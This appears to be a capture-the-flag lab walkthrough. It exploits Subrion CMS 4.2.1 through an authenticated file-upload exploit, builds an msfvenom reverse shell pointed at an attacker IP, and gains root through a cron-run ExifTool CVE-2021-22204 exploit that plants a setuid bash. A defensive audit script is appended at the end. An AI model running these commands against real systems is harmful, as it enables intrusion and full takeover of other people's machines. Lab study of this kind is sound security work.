Ports

  1. 22
  2. 80

HTTP

Apache httpd 2.4.41 ((Ubuntu))

Robots.txt

User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/

Found a login page under /panel/ running Subrion CMS 4.2.1

└─$ searchsploit -m 49876
  Exploit: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)
      URL: https://www.exploit-db.com/exploits/49876
     Path: /usr/share/exploitdb/exploits/php/webapps/49876.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators
 
Copied to: /home/kali/49876.py
 
python3 49876.py -u http://exfiltrated.offsec/panel/ --user admin --pass admin
 
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.118.11 LPORT=4444 -f elf -o shell
 

Running lse.sh

Found a crontab entry that runs exiftool

searchsploit exiftool

ExifTool PoC (CVE-2021-22204)

sudo apt install djvulibre-bin
git clone https://github.com/UNICORDev/exploit-CVE-2021-22204.git
python exploit-CVE-2021-22204.py -c 'cp /usr/bin/bash /var/www/html/subrion/uploads/rootbash; chmod +s /var/www/html/subrion/uploads/rootbash'

Wait for the cron job to run, then:

./rootbash -p
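
Defender-side check for the two conditions this escalation depended on: an ExifTool build in the range affected by CVE-2021-22204, and a set-ID file sitting in the web root. This script is an added example, not part of the original notes. The function names are hypothetical, and the affected range (7.44 up to, but not including, 12.24) is taken from the public advisory rather than from this page.

```shell
#!/bin/sh
# Added example: audit a host for the cron + ExifTool escalation path above.

# exiftool_affected VERSION
# Returns 0 if VERSION is in the CVE-2021-22204 range (>= 7.44 and < 12.24),
# 1 if it is outside the range, 2 if VERSION is not a decimal number.
# Assumes the plain decimal format printed by `exiftool -ver` (e.g. 12.23).
exiftool_affected() {
    case "$1" in
        ''|*[!0-9.]*) return 2 ;;
    esac
    awk -v v="$1" 'BEGIN { exit !(v + 0 >= 7.44 && v + 0 < 12.24) }'
}

# find_setid DIR
# Prints every regular file under DIR that has the setuid or setgid bit set.
# A web upload directory should normally contain none.
find_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# audit WEBROOT
# Reports the installed ExifTool version status and any set-ID files found.
audit() {
    if command -v exiftool >/dev/null 2>&1; then
        ver=$(exiftool -ver)
        if exiftool_affected "$ver"; then
            echo "exiftool $ver: in the range affected by CVE-2021-22204"
        else
            echo "exiftool $ver: outside the affected range"
        fi
    else
        echo "exiftool: not installed"
    fi
    find_setid "$1" | while IFS= read -r f; do
        echo "set-ID file under web root: $f"
    done
}

# Runs only when a directory is passed, e.g.: sh audit.sh /var/www/html
if [ $# -gt 0 ]; then
    audit "$1"
fi
```
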